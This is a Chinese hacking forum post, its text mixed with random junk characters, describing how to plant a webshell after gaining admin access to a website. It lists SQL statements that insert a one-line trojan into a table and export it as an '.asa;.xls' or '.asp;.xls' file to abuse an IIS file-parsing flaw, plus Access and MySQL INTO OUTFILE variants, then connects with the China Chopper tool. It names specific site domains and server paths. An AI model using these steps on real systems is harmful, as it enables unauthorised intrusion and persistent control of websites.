好不容易进了后台,发现啥上传啊。备份啊多木有。4 _! F: `( P& C+ s) s1 ^/ _
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的! `5 }! W" h' g9 A: N d
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,. L* V" A5 b( Q! _+ A4 [
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
0 C$ V' U2 c. w$ @' k; q6 c! h1.create table cmd (a varchar(50)) s! N( Z5 \- h+ K
2.insert into cmd (a) values (‘‘)
; E$ ]1 x1 v' Q2 i! I$ E! Z/ u3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd9 Q$ C0 d! k& W z
(把表cmd的内容导出为物理路径的一个EXCEL文件)
0 e4 V& a2 e$ g& {/ c' [* @4.drop table cmd2 I$ j" @+ _# I' h
利用IIS的BUG成功拿到了WEBSHELL。
# Y, I' ], w: X# B. ?% n+ k( P% o, F. R& b8 I7 n$ ?2 N
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
5 B0 A, \6 I8 P5 |6 @) t# s$ U$ A$ Y* V. H
SQL语句意思解释:
6 h9 c) s) U" w9 S4 w* Q 第一句9 Y# U: o; P: } w# q$ h
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
. \: z$ b+ n9 P
, @. X' Y% O" o& N! L# {7 g 第二句 g* n% l0 Y. o
在表cmd的a字段插入一句话木马
$ q9 S) A! B7 C/ [ 第三句. [8 \& m; G7 Q8 G7 g
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
1 B+ L8 r o5 w9 N7 A
1 D! Q, h' g3 L9 i" k2 u# b 第四句# q3 R# J" _# G8 f9 v
删除建立的cmd表
: V4 k G% V8 |& S
9 E& @& a2 b: x/ H 以下内容为测试:
! b( B, i0 o8 r! G" Z Access利用后台SQL执行命令功能导出WebShell:9 s' d6 O, s( R0 T. q
这个更简单:! J7 @7 U! t! @# s9 H
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]4 r1 y( Z7 d. f! U
或者 f: q' }7 l' n& G
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
) C, D$ ]* D- x9 c6 j3 [3 A( }7 G; Z6 _
后台有执行SQL语句功能(vote为已知表段)# b! y" I5 S6 J7 k( Y, c7 C6 c- j
希望对大家有所帮助拿shell的又一个思路
+ R d; [- N* T8 w3 T$ f |